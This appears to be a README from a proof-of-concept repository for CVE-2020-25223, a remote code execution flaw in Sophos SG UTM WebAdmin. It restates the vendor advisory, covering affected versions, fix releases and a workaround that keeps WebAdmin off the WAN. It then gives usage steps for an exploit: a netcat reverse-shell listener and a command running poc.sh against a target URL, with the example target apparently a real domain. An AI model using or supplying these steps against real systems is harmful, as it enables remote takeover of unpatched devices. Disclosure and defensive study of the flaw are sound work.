# About
## Overview
A remote code execution vulnerability in the WebAdmin of SG UTM was discovered and responsibly disclosed to Sophos in 2020. It was reported via the Sophos bug bounty program by an external security researcher. The vulnerability was fixed in September 2020.
Devices that have not been updated in the last year and still have WebAdmin exposed to the WAN are vulnerable. Check this Knowledge Base Article for additional information to determine if a device has been compromised and how to remediate.
## Applies to the following Sophos product(s) and version(s)
Sophos SG UTM
## Remediation
Fix included in SG UTM v9.705 MR5, v9.607 MR7, and v9.511 MR11 on September 17, 2020
Users of older versions of SG UTM are required to upgrade to receive this fix
Additionally, Sophos recommends that SG UTM customers upgrade to the latest available release.
## Workaround
Customers can protect themselves by ensuring their WebAdmin is not exposed to WAN.
This can be achieved by keeping Internal (LAN) (Network) or another internal-only network definition as the sole entry in Management→WebAdmin Settings→WebAdmin Access Configuration→Allowed Networks.
## Related information
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25223
# POC
Run reverse shell listener:
```bash
nc -l local_port
```
Then run POC:
```bash
bash poc.sh remote_url local_ip local_port
```
* _remote_url_ is vulnerable remote php script, e.g. `https://survey.funx.vn:443/var`
* _local_ip_ is an attacker machine IP
* _local_port_ is an attacker machine port
If the exploit succeeds, you'll get the shell.
[4.0K] /data/pocs/8f6c7691b4bcb9b3141c68f7055af244619e64ba
├── [ 39K] payload.bin
├── [ 593] poc.sh
└── [1.6K] README.md
0 directories, 3 files